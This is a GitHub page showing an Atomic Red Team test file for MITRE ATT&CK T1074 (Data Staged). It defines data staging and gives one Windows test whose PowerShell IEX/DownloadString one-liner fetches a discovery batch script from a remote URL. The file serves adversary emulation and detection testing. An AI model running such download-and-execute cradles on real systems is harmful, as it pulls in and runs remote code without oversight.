Skip to content

Latest commit

 

History

History
24 lines (15 loc) · 1.07 KB

T1074.md

File metadata and controls

24 lines (15 loc) · 1.07 KB

T1074 - Data Staged

Collected data is staged in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Data Compressed](https://attack.mitre.org/techniques/T1002) or [Data Encrypted](https://attack.mitre.org/techniques/T1022).

Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location.

Atomic Tests


Atomic Test #1 - Stage data from Discovery.bat

Utilize powershell to download discovery.bat and save to a local file

Supported Platforms: Windows

Run it with powershell!

"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > c:\windows\pi.log